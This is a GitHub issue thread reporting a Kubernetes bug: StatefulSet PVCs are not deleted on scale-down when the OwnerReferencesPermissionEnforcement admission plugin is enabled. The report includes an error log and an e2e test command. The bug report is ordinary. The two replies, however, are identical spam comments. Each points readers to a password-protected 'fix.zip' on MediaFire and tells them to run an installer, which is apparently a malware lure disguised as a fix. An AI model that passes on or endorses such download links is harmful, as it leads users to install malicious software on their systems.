### ISSUE TITLE
StatefulSet PersistentVolumeClaimRetentionPolicy not deleting pods when `WhenScaled: Delete` is used

### ISSUE THREAD

**Issue by atiratree** [kubernetes/kubernetes#126919]
### What happened?

When OwnerReferencesPermissionEnforcement admission plugin is used the PVCs are not deleted and KCM logs show

```
stateful_set.go:438] "Unhandled Error" err="error syncing StatefulSet e2e-statefulset-1256/ss, requeuing: could not update claim datadir-ss-2 for delete policy ownerRefs: persistentvolumeclaims \"datadir-ss-2\" is forbidden: cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on: , <nil>" logger="UnhandledError"
```

### What did you expect to happen?

PVCs should have ownerReferences set and the PVCs should be garbage collected on scale down

### How can we reproduce it (as minimally and precisely as possible)?

3 of 6 of the following tests fail when OwnerReferencesPermissionEnforcement admission plugin is turned on
```
./hack/ginkgo-e2e.sh --ginkgo.focus=".*Non-retain StatefulSetPersistentVolumeClaimPolicy should.*" --ginkgo.v
```

### Kubernetes version

<details>

```console
$ kubectl version
Client Version: v1.29.8
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.32.0-alpha.0.233+b3c725627b15bb-dirty

```

</details>

### Cloud provider

<details>
NA
</details>

### OS version

<details>

```console
# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here
```

</details>

### Install tools

<details>

</details>

### Container runtime (CRI) and version (if applicable)

<details>

</details>

### Related plugins (CNI, CSI, ...) and versions (if applicable)

<details>

</details>

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
